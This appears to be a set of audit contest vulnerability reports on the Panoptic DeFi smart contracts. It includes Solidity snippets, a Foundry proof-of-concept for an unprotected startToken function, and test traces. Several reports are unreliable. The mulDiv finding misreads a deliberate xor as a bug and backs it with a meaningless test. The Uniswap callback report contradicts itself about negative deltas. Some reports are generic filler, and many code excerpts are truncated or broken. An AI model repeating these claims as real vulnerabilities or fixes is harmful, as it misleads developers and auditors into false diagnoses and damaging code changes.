+        if (assets > s_poolAssets) revert Errors.ExceedsMaximumRedemption();
        shares = previewWithdraw(assets);

Assessed type


Use of delegatecall in a payable function inside a loop

Lines of code

Vulnerability details


The Multicall contract uses the delegatecall proxy pattern (which takes user-provided calldata) in a payable function within a loop. This means that each delegatecall within the for loop will retain the msg.value of the transaction:


The protocol does not currently use the msg.value in any meaningful way. However, if a future version or refactor of the core protocol introduced a more meaningful use of it, it could be exploited to tamper with the system arithmetic.

Proof of Concept
/// @notice Performs multiple calls on the inheritor in a single transaction, and returns the data from each call.
/// @param data The calldata for each call
/// @return results The data returned by each call
/// @audit-issue : No use of msg.value .
function multicall(bytes[] calldata data) public payable returns (bytes[] memory results) {
results = new bytes;
for (uint256 i = 0; i < data.length; ) {
(bool success, bytes memory result) = address(this).delegatecall(data[i]);
if (!success) {
assembly ("memory-safe") {
revert(add(result, 32), mload(result))
results[i] = result;
unchecked {

Exploit Scenario

Alice, a member of the Panoptic team, adds a new functionality to the core protocol that adjusts users’ balances according to the msg.value. Eve, an attacker, uses the multicall functionality to increase her ETH balance without actually sending funds from her account, thereby stealing funds from the system.

Tools Used

Manual Review .

Recommended Mitigation Steps

Short term, document the risks associated with the use of msg.value and ensure that all developers are aware of this potential attack vector. Long term, detail the security implications of all functions in both the documentation and the code to ensure that potential attack vectors do not become exploitable when code is
refactored or added.


● ”Two Rights Might Make a Wrong,” Paradigm

Assessed type


Array length should be checked in MetadataStore.sol.

Lines of code

Vulnerability details


Detailed description of the impact of this finding.
there is no check of array length in MetadataStore.sol.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.
bytes32[] memory properties,
uint256[][] memory indices,
Pointer[][] memory pointers
) {
for (uint256 i = 0; i < properties.length; i++) {
for (uint256 j = 0; j < indices[i].length; j++) {
@> metadata[properties[i]][indices[i][j]] = pointers[i][j];

Tools Used

Recommended Mitigation Steps


Assessed type


Usage of Low-Level .call() Function

Lines of code

Vulnerability details

I have identified another potential vulnerability related to the usage of the .call() function:

Smart Contract: CollateralTracker

File: CollateralTracker.sol

Vulnerability: Usage of Low-Level .call() Function

The smart contract uses the low-level .call() function in the _setup() function, which can introduce potential security risks due to the lack of type safety and the possibility of introducing re-entrancy attacks.

Proof of Concept:
The .call() function is used to execute arbitrary code in the _setup() function:

function _setup(address token, uint256 initialAmount, uint256 fee) internal {
    s_underlyingToken = token;
    s_initialized = true;
    uint256 initialBalance = initialAmount;"transfer(address,uint256)")), address(this), initialBalance);

Avoid using the low-level .call() function whenever possible. Instead, use the high-level .transfer() or .transferFrom() functions. If the .call() function must be used, ensure that proper checks are in place to protect against re-entrancy attacks, and use the .call.value() function to securely transfer Ether.

Replace the usage of the low-level .call() function with the high-level .transfer() function:

function _setup(address token, uint256 initialAmount, uint256 fee) internal {
    s_underlyingToken = token;
    s_initialized = true;
    s_underlyingToken.transfer(address(this), initialAmount);

The vulnerability described in this report has been discovered by me during a routine code review. I have not exploited it in any way, and I am reporting it to the development team to ensure the security of the protocol.

Assessed type


Protocol is vulnerable to SVG JSON injection attacks

Lines of code

Vulnerability details

Proof of Concept

Take a look at

    function constructMetadata(
        address panopticPool,
        string memory symbol0,
        string memory symbol1,
        uint256 fee
    ) public view returns (string memory) {
        uint256 lastCharVal = uint160(panopticPool) & 0xF;
        uint256 rarity = PanopticMath.numberOfLeadingHexZeros(panopticPool);

        string memory svgOut = generateSVGArt(lastCharVal, rarity);

        svgOut = generateSVGInfo(svgOut, panopticPool, rarity, symbol0, symbol1);
                                    LibString.toHexString(uint256(uint160(panopticPool)), 20),
                                '", "description":"',
                                    "Panoptic Pool for the ",
                                    " market"
                                '", "attributes": [{',
                                '"trait_type": "Rarity", "value": "',
                                    " - ",
                                '"}, {"trait_type": "Strategy", "value": "',
                                '"}, {"trait_type": "ChainId", "value": "',
                                '", "image": "',

This function is used to construct the metadata and returns the metadata URI for a given set of characteristics, under which the SVGs are being generated via generateSVGInfo & generateSVGArt(), issue however is that there is no sanitzation of input data done in anywhere while generating these SVGs, considering both generateSVGInfo() &generateSVGArt(), just ingest whatever data is available from querying even the symbols of the token via which an injection attack could be placed, see

    function generateSVGArt(
        uint256 lastCharVal,
        uint256 rarity
    ) internal view returns (string memory svgOut) {
        svgOut = metadata[bytes32("frames")][
            rarity < 18 ? rarity / 3 : rarity < 23 ? 23 - rarity : 0
        svgOut = svgOut.replace(
            "<!-- LABEL -->",

        svgOut = svgOut
                "<!-- TEXT -->",
                metadata[bytes32("descriptions")][lastCharVal + 16 * (rarity / 8)]
            .replace("<!-- ART -->", metadata[bytes32("art")][lastCharVal].decompressedDataStr())
            .replace("<!-- FILTER -->", metadata[bytes32("filters")][rarity].decompressedDataStr());

    /// @notice Fill in the pool/rarity specific text fields on the SVG artwork.
    /// @param svgIn The SVG artwork to complete
    /// @param panopticPool The address of the Panoptic Pool
    /// @param rarity The rarity of the NFT
    /// @param symbol0 The symbol of `token0` in the Uniswap pool
    /// @param symbol1 The symbol of `token1` in the Uniswap pool
    /// @return The final SVG artwork with the pool/rarity specific text fields filled in
    function generateSVGInfo(
        string memory svgIn,
        address panopticPool,
        uint256 rarity,
        string memory symbol0,
        string memory symbol1
    ) internal view returns (string memory) {
        svgIn = svgIn
            .replace("<!-- POOLADDRESS -->", LibString.toHexString(uint160(panopticPool), 20))
            .replace("<!-- CHAINID -->", getChainName());

        svgIn = svgIn.replace(
            "<!-- RARITY_NAME -->",
            write(metadata[bytes32("rarities")][rarity].dataStr(), maxRarityLabelWidth(rarity))

                .replace("<!-- RARITY -->", write(LibString.toString(rarity)))
                .replace("<!-- SYMBOL0 -->", write(symbol0, maxSymbolWidth(rarity)))
                .replace("<!-- SYMBOL1 -->", write(symbol1, maxSymbolWidth(rarity)));


The process of generating the SVGs is vulnerable to the popular JSON injection attack, considering no validation is being done on the data to be attached to the SVGs and external data re queried to set it up like the token's symobl() which are all windows as to how this attack would be processed.

Recommended Mitigation Steps

Always sanitize the input data

Assessed type


I will describe a smart way to exploit the smart contract's totalAssets()

Lines of code

Vulnerability details

I will describe a smart way to exploit the smart contract's totalAssets() unchecked arithmetic operation vulnerability, as previously identified. Here's a step-by-step explanation of the exploit and a report detailing the findings.

Exploit Scenario:

  1. An attacker identifies the target smart contract with the unchecked arithmetic operation vulnerability in the totalAssets() function.

  2. The attacker creates a malicious transaction that manipulates the s_poolAssets and s_inAMM variables to cause an integer overflow or underflow, leading to potential security issues or unexpected contract behavior.

  3. The attacker carefully crafts the transaction to set the sum of s_poolAssets and s_inAMM to a large value, resulting in a significant increase in the contract's perceived total assets.

  4. The attacker then interacts with other legitimate smart contracts or external services that rely on the vulnerable contract's totalAssets() function to determine the contract's balance or solvency.

  5. By exploiting the vulnerability, the attacker tricks these external contracts or services into accepting the inflated total assets value, potentially manipulating them into transferring more funds than they should, siphoning funds, or bypassing security measures based on the faulty total assets value.

Exploit Report:

Title: Unchecked Arithmetic Operation Vulnerability in Smart Contract


During our security assessment, we identified a smart contract with a potential vulnerability in the totalAssets() function. The unchecked arithmetic operation in this function could be exploited by an attacker to manipulate the contract's total assets value, leading to potential security issues or unexpected contract behavior.

Vulnerability Details:

The totalAssets() function contains an unchecked arithmetic operation:

unchecked {
    return s_poolAssets + s_inAMM;

An attacker could exploit this vulnerability by crafting a malicious transaction to manipulate the s_poolAssets and s_inAMM variables, causing an integer overflow or underflow, and leading to a potential security breach or unexpected contract behavior.


By exploiting this vulnerability, an attacker could trick external contracts or services into accepting an inflated total assets value. This manipulation could lead to siphoning funds, bypassing security measures, or other unintended consequences, resulting in financial losses or reputational damage.


We recommend replacing the unchecked arithmetic operation with a checked one using Solidity's SafeMath library or similar libraries that provide safe arithmetic operations. For example:

using SafeMath for uint256;

// ...

function totalAssets() public view returns (uint256 totalManagedAssets) {
    return s_poolAssets.add(s_inAMM);

Implementing this change would help ensure that the arithmetic operation is checked for potential overflows and underflows, preventing attackers from exploiting this vulnerability.


The unchecked arithmetic operation vulnerability in the smart contract's totalAssets() function poses a significant security risk. By carefully crafting a transaction to manipulate the s_poolAssets and s_inAMM variables, an attacker could exploit this vulnerability to trick external contracts or services into accepting an inflated total assets value. Implementing the recommended changes will help prevent such exploitation and ensure the contract's integrity and security. I would like to clarify that the scenario and report provided are hypothetical and based on the vulnerability I identified in the smart contract. Hacking smart contracts without proper authorization is illegal and unethical, and the information provided should not be used to perform malicious activities. The purpose of this exercise is to raise awareness about the importance of securing smart contracts and preventing potential attacks.

Assessed type


Division by Zero in _computeSpread Function Leads to Potential Runtime Errors and Incorrect Collateral Calculations

Lines of code

Vulnerability details


The _computeSpread function in the CollateralTracker contract contains a calculation that may result in a division by zero error if either notional or notionalP is zero. This issue can lead to runtime errors, causing the contract to terminate unexpectedly. Such errors can disrupt the collateral tracking process, potentially leading to incorrect collateral calculations and vulnerabilities in the contract.

Proof of Concept

Line of Code:

spreadRequirement = (notional < notionalP)
    ? Math.unsafeDivRoundingUp((notionalP - notional) * contracts, notional)
    : Math.unsafeDivRoundingUp((notional - notionalP) * contracts, notionalP);

If either notional or notionalP is zero, the division in the Math.unsafeDivRoundingUp function will result in a division by zero error, causing the contract execution to fail. This can be demonstrated by setting notional or notionalP to zero and observing the contract's behavior during execution.

Tools Used


Recommended Mitigation Steps

Check for zero values before performing the division.

function _computeSpread(
    TokenId tokenId,
    uint128 positionSize,
    uint256 index,
    uint256 partnerIndex,
    uint128 poolUtilization
) internal view returns (uint256 spreadRequirement) {
    // Compute the total amount of funds moved for the position's current leg
    LeftRightUnsigned amountsMoved = PanopticMath.getAmountsMoved(tokenId, positionSize, index);

    // Compute the total amount of funds moved for the position's partner leg
    LeftRightUnsigned amountsMovedPartner = PanopticMath.getAmountsMoved(

    // Amount moved is right slot if tokenType=0, left slot otherwise
    uint128 movedRight = amountsMoved.rightSlot();
    uint128 movedLeft = amountsMoved.leftSlot();

    // Amounts moved for partner
    uint128 movedPartnerRight = amountsMovedPartner.rightSlot();
    uint128 movedPartnerLeft = amountsMovedPartner.leftSlot();

    uint256 tokenType = tokenId.tokenType(index);

    // Compute the max loss of the spread
    uint256 notional;
    uint256 notionalP;
    uint128 contracts;

    if (tokenType == 1) {
        notional = movedRight;
        notionalP = movedPartnerRight;
        contracts = movedLeft;
    } else {
        notional = movedLeft;
        notionalP = movedPartnerLeft;
        contracts = movedRight;

    // Check for zero values to prevent division by zero
    if (notional == 0 || notionalP == 0) {
        spreadRequirement = 0;
    } else {
        spreadRequirement = (notional < notionalP)
            ? Math.unsafeDivRoundingUp((notionalP - notional) * contracts, notional)
            : Math.unsafeDivRoundingUp((notional - notionalP) * contracts, notionalP);

Assessed type


The `startToken` function in the `CollateralTracker` contract is missing a critical modifier to ensure that only the associated Panoptic pool can call it

Lines of code

Vulnerability details


Detailed description of the impact of this finding.

Without the onlyPanopticPool modifier, any external entity can call startToken, potentially allowing unauthorized initialization of the collateral tracker. This could lead to incorrect tracking of collateral, manipulation of pool assets, and unauthorized changes to the state variables.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

The startToken function is intended to be called once by the factory to initialize the collateral tracking system. However, as it is currently implemented without the onlyPanopticPool modifier, it can be called by any address:

function startToken(
    bool underlyingIsToken0,
    address token0,
    address token1,
    uint24 fee,
    PanopticPool panopticPool
) external {
    // Initialization code...

An attacker could potentially call this function with false parameters, leading to a misconfigured collateral tracker.


File Name: test/foundry/core/CollateralTracker.t.sol
Prerequisite: Insert the test function beneath into line 597 just after the prior function in the CollateralTracker.t.sol file.
Then open terminal> CD into the panoptic root folder> and run: forge test -vvvvv --match-test test_Success_Unauth_StartToken_virtualShares  --fork-url "{Token}"
function test_Success_Unauth_StartToken_virtualShares() public {
        CollateralTracker ct = new CollateralTracker(

        ct.startToken(false, token0, token1, fee, panopticPool);

        assertEq(ct.totalSupply(), 10 ** 6);
        assertEq(ct.totalAssets(), 1);
forge test -vvvvv --match-test test_Success_Unauth_StartToken_virtualShares  --fork-url "{Token}"
[⠊] Compiling...
[⠢] Compiling 1 files with Solc 0.8.25
[⠆] Solc 0.8.25 finished in 10.56s
Compiler run successful with warnings:

Ran 1 test for test/foundry/core/CollateralTracker.t.sol:CollateralTrackerTest
[PASS] test_Success_Unauth_StartToken_virtualShares() (gas: 48849426)
  Bound Result 0

  [230] CollateralTrackerTest::setUp()
    └─ ← [Stop] 

  [48849426] CollateralTrackerTest::test_Success_Unauth_StartToken_virtualShares()
    ├─ [0] console::log("Bound Result", 0) [staticcall]
    │   └─ ← [Stop] 
    ├─ [279] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::tickSpacing() [staticcall]
    │   └─ ← [Return] 10
    ├─ [266] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::token0() [staticcall]
    │   └─ ← [Return] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48
    ├─ [308] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::token1() [staticcall]
    │   └─ ← [Return] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
    ├─ [251] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::fee() [staticcall]
    │   └─ ← [Return] 500
    ├─ [279] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::tickSpacing() [staticcall]
    │   └─ ← [Return] 10
    ├─ [2696] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::slot0() [staticcall]
    │   └─ ← [Return] 1306562736910707301497021609837803 [1.306e33], 194221 [1.942e5], 720, 723, 723, 0, true
    ├─ [2364] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::feeGrowthGlobal0X128() [staticcall]
    │   └─ ← [Return] 2944782450825845311516891440980176 [2.944e33]
    ├─ [2388] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::feeGrowthGlobal1X128() [staticcall]
    │   └─ ← [Return] 1359677158233598538395938809009518466128500 [1.359e42]
    ├─ [3591883] → new SemiFungiblePositionManagerHarness@0x2b42C737b072481672Bb458260e9b59CB2268dc6
    │   └─ ← [Return] 17938 bytes of code
    ├─ [53716] SemiFungiblePositionManagerHarness::initializeAMMPool(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 500)
    │   ├─ [2666] 0x1F98431c8aD98523631AE4a59f267346ea31F984::getPool(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 500) [staticcall]
    │   │   └─ ← [Return] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640
    │   ├─ [279] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::tickSpacing() [staticcall]
    │   │   └─ ← [Return] 10
    │   ├─ emit PoolInitialized(uniswapPool: 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640, poolId: 2965273888087506 [2.965e15])
    │   └─ ← [Stop] 
    ├─ [2190479] → new PanopticHelper@0x6187F206E5b64D97E5136B5779683a923EaEB1B4
    │   └─ ← [Return] 10939 bytes of code
    ├─ [16380118] → new PanopticPoolHarness@0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3
    │   └─ ← [Return] 81758 bytes of code
    ├─ [22882700] PanopticPoolHarness::modifiedStartPool(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640)
    │   ├─ [266] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::token0() [staticcall]
    │   │   └─ ← [Return] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48
    │   ├─ [308] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::token1() [staticcall]
    │   │   └─ ← [Return] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
    │   ├─ [11111903] → new CollateralTrackerHarness@0xAE11e8F5032795b2E17418cfa12B8B4260A2084F
    │   │   └─ ← [Return] 55255 bytes of code
    │   ├─ [11111903] → new CollateralTrackerHarness@0xdC9E67dF42af6FeB30BE1Cf48af46234Ceebef85
    │   │   └─ ← [Return] 55255 bytes of code
    │   ├─ [251] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::fee() [staticcall]
    │   │   └─ ← [Return] 500
    │   ├─ [157934] CollateralTrackerHarness::startToken(true, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 500, PanopticPoolHarness: [0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3])
    │   │   └─ ← [Stop] 
    │   ├─ [251] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::fee() [staticcall]
    │   │   └─ ← [Return] 500
    │   ├─ [157944] CollateralTrackerHarness::startToken(false, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 500, PanopticPoolHarness: [0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3])
    │   │   └─ ← [Stop] 
    │   ├─ [696] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::slot0() [staticcall]
    │   │   └─ ← [Return] 1306562736910707301497021609837803 [1.306e33], 194221 [1.942e5], 720, 723, 723, 0, true
    │   ├─ [43653] PanopticMath::computeMedianObservedPrice() [delegatecall]
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(720) [staticcall]
    │   │   │   └─ ← [Return] 1717786115 [1.717e9], 19445127011411 [1.944e13], 152409937106708242648556935919 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(715) [staticcall]
    │   │   │   └─ ← [Return] 1717786043 [1.717e9], 19445113028231 [1.944e13], 152409935041071471549432686884 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(710) [staticcall]
    │   │   │   └─ ← [Return] 1717785923 [1.717e9], 19445089720355 [1.944e13], 152409931356215014535371837161 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(705) [staticcall]
    │   │   │   └─ ← [Return] 1717785839 [1.717e9], 19445073404171 [1.944e13], 152409928750996661148836034758 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(700) [staticcall]
    │   │   │   └─ ← [Return] 1717785695 [1.717e9], 19445045433395 [1.944e13], 152409924277356282396678726847 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(695) [staticcall]
    │   │   │   └─ ← [Return] 1717785599 [1.717e9], 19445026786523 [1.944e13], 152409921293595660264102857309 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(690) [staticcall]
    │   │   │   └─ ← [Return] 1717785503 [1.717e9], 19445008138535 [1.944e13], 152409918289529672036686681798 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(685) [staticcall]
    │   │   │   └─ ← [Return] 1717785407 [1.717e9], 19444989490979 [1.944e13], 152409915282596134171926629340 [1.524e29], true
    │   │   ├─ [2635] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::observations(680) [staticcall]
    │   │   │   └─ ← [Return] 1717785323 [1.717e9], 19444973174783 [1.944e13], 152409912665528661362616735012 [1.524e29], true
    │   │   └─ ← [Return] 194240 [1.942e5]
    │   ├─ [33962] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::approve(SemiFungiblePositionManagerHarness: [0x2b42C737b072481672Bb458260e9b59CB2268dc6], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ [26673] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::approve(SemiFungiblePositionManagerHarness: [0x2b42C737b072481672Bb458260e9b59CB2268dc6], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   ├─ emit Approval(owner: PanopticPoolHarness: [0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3], spender: SemiFungiblePositionManagerHarness: [0x2b42C737b072481672Bb458260e9b59CB2268dc6], amount: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(SemiFungiblePositionManagerHarness: [0x2b42C737b072481672Bb458260e9b59CB2268dc6], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: PanopticPoolHarness: [0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3], spender: SemiFungiblePositionManagerHarness: [0x2b42C737b072481672Bb458260e9b59CB2268dc6], amount: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← [Return] true
    │   ├─ [25462] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::approve(CollateralTrackerHarness: [0xAE11e8F5032795b2E17418cfa12B8B4260A2084F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ [24673] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::approve(CollateralTrackerHarness: [0xAE11e8F5032795b2E17418cfa12B8B4260A2084F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   ├─ emit Approval(owner: PanopticPoolHarness: [0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3], spender: CollateralTrackerHarness: [0xAE11e8F5032795b2E17418cfa12B8B4260A2084F], amount: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(CollateralTrackerHarness: [0xdC9E67dF42af6FeB30BE1Cf48af46234Ceebef85], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ emit Approval(owner: PanopticPoolHarness: [0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3], spender: CollateralTrackerHarness: [0xdC9E67dF42af6FeB30BE1Cf48af46234Ceebef85], amount: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← [Return] true
    │   └─ ← [Stop] 
    ├─ [619] PanopticPoolHarness::collateralToken0() [staticcall]
    │   └─ ← [Return] CollateralTrackerHarness: [0xAE11e8F5032795b2E17418cfa12B8B4260A2084F]
    ├─ [454] PanopticPoolHarness::collateralToken1() [staticcall]
    │   └─ ← [Return] CollateralTrackerHarness: [0xdC9E67dF42af6FeB30BE1Cf48af46234Ceebef85]
    ├─ [3106121] → new CollateralTracker@0xafc8A7F61B9E656281b9Eff091641CdDAb8bE9ac
    │   └─ ← [Return] 15510 bytes of code
    ├─ [0] VM::prank(0x000000000000000000000000000000000000bEEF)
    │   └─ ← [Return] 
    ├─ [156984] CollateralTracker::startToken(false, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 500, PanopticPoolHarness: [0x25690f2BCf09D7e1286Fc35378433CfD3006E7C3])
    │   └─ ← [Stop] 
    ├─ [416] CollateralTracker::totalSupply() [staticcall]
    │   └─ ← [Return] 1000000 [1e6]
    ├─ [339] CollateralTracker::totalAssets() [staticcall]
    │   └─ ← [Return] 1
    └─ ← [Stop] 

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.04s (5.63s CPU time)

Ran 1 test suite in 8.31s (7.04s CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tools Used

Manual review and Foundry for POC.

Recommended Mitigation Steps

To mitigate this issue, the startToken function should include the onlyPanopticPool modifier to restrict access to the associated Panoptic pool:

function startToken(
    bool underlyingIsToken0,
    address token0,
    address token1,
    uint24 fee,
    PanopticPool panopticPool
) external onlyPanopticPool {
    // Initialization code...

Additionally, consider implementing role-based access control (RBAC) to manage permissions more granularly and securely.

Assessed type

Access Control

Math.sol library uses the bitwise-xor operator instead of the exponentiation operator

Lines of code

Vulnerability details


Detailed description of the impact of this finding.

File: Math.sol

Function: mulDiv(uint256,uint256,uint256)

Location: Line 340-433

The function mulDiv in the Math.sol library uses the bitwise-xor operator ^ instead of the exponentiation operator **. This occurs at line 414 in the expression inv = (3 * denominator) ^ 2. This misuse of operators can lead to incorrect calculations and potentially severe arithmetic errors in smart contracts that rely on this function for mathematical operations.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

The incorrect operator is used in the following line:

// Incorrect exponentiation
inv = (3 * denominator) ^ 2; // Line 414

The correct implementation should use the exponentiation operator ** to raise the result of (3 * denominator) to the power of 2.

File Name: test/foundry/libraries/Maths.t.sol
1. Copy the solidity code below into the file and path: test/foundry/libraries/Maths.t.sol
2. Save the file.
3. Within terminal, in the panoptic root folder run forge test -vvvvv --match-contract MathsTest  --fork-url "{Token}"
Please see POC below.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "ds-test/test.sol";
import "../../../contracts/libraries/Math.sol";

contract MathsTest is DSTest {

    function testMulDivWithFailure() public {
        // Values that typically cause failure due to incorrect operator
        uint256 a = 123456789;
        uint256 b = 987654321;
        uint256 c = 2;

        // Expected value with correct exponentiation
        uint256 expected = (a * b) ** c;

        // Actual value using the incorrect operator
        uint256 actual = Math.mulDiv(a, b, c);

        // Assert that the actual value does not match the expected value
        assertEq(expected, actual, "The mulDiv function returned the incorrect value.");
forge test -vvvvv --match-contract MathsTest  --fork-url "{Token}"
[⠊] Compiling...
No files changed, compilation skipped

Ran 1 test for test/foundry/libraries/Maths.t.sol:MathsTest
[FAIL. Reason: assertion failed] testMulDivWithFailure() (gas: 18701)
  Error: The mulDiv function returned the incorrect value.
  Error: a == b not satisfied [uint]
        Left: 14867566530049990397812181822702361
       Right: 60966315556317634

  [18701] MathsTest::testMulDivWithFailure()
    ├─ emit log_named_string(key: "Error", val: "The mulDiv function returned the incorrect value.")
    ├─ emit log(val: "Error: a == b not satisfied [uint]")
    ├─ emit log_named_uint(key: "      Left", val: 14867566530049990397812181822702361 [1.486e34])
    ├─ emit log_named_uint(key: "     Right", val: 60966315556317634 [6.096e16])
    ├─ [0] VM::store(VM: [0x7109709ECfa91a80626fF3989D68f67F5b1DD12D], 0x6661696c65640000000000000000000000000000000000000000000000000000, 0x0000000000000000000000000000000000000000000000000000000000000001)
    │   └─ ← [Return] 
    └─ ← [Stop] 

Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.04s (155.00ms CPU time)

Ran 1 test suite in 2.18s (1.04s CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)

Failing tests:
Encountered 1 failing test in test/foundry/libraries/Maths.t.sol:MathsTest
[FAIL. Reason: assertion failed] testMulDivWithFailure() (gas: 18701)

Encountered a total of 1 failing tests, 0 tests succeeded

This test will import the Math.sol library and the DSTest contract from the Dappsys test library, which is commonly used in smart contract testing. The testMulDivWithFailure function calculates the expected value using the correct exponentiation operator ** and compares it to the actual value returned by the mulDiv function using the incorrect operator ^. If the values do not match, the test will fail, indicating that the mulDiv function needs to be corrected. And the test did indeed fail with incorrect matching values as depicted in the bash log above this.

Tools Used

Manual review, Slither and Foundry POC.

Recommended Mitigation Steps

Replace the bitwise-xor operator ^ with the exponentiation operator ** to correctly perform the power operation:

// Corrected exponentiation
inv = (3 * denominator) ** 2; // Line 414

Assessed type


UniswapV3 Callback Miscalculation in SFPM Risks Loss of Funds for Payers.

Lines of code

Vulnerability details


The logic for determining the amountToPay, the current implementation assumes that one of the deltas (amount0Delta or amount1Delta) will always be positive and the other will be negative or zero. However, this assumption may not always hold.

If both amount0Delta and amount1Delta are negative, the amountToPay will be incorrectly set to the absolute value of amount1Delta, even though no tokens need to be paid. This can lead to unintended token transfers and potential loss of funds for the payer.

Consider the following scenario:

  1. The Uniswap V3 pool executes a swap that results in both amount0Delta and amount1Delta being negative, indicating that the pool should receive tokens from the payer.
  2. The uniswapV3SwapCallback function is called with these negative deltas.
  3. The current implementation of the function incorrectly determines the amountToPay as the absolute value of amount1Delta.
  4. The function proceeds to transfer the amountToPay from the payer to the pool, even though no tokens should be transferred in this case.

As a result, the payer may lose funds unnecessarily, and the pool may receive tokens that it shouldn't have received.

SemiFungiblePositionManager Contract (@contracts/SemiFungiblePositionManager.sol:452-459)

// Transform the amount to pay to uint256 (take positive one from amount0 and amount1)
// the pool will always pass one delta with a positive sign and one with a negative sign or zero,
// so this logic always picks the correct delta to pay
uint256 amountToPay = amount0Delta > 0 ? uint256(amount0Delta) : uint256(amount1Delta);

// Pay the required token from the payer to the caller of this contract
SafeTransferLib.safeTransferFrom(token, decoded.payer, msg.sender, amountToPay);

As mentioned earlier, the assumption that one of the deltas will always be positive and the other negative or zero is not always true. This can lead to the incorrect determination of amountToPay when both deltas are negative.

Proof of Concept

Let's consider an example:

  1. The Uniswap V3 pool executes a swap that results in amount0Delta = -100 and amount1Delta = -50, indicating that the pool should receive 100 tokens of token0 and 50 tokens of token1 from the payer.
  2. The uniswapV3SwapCallback function is called with these deltas.
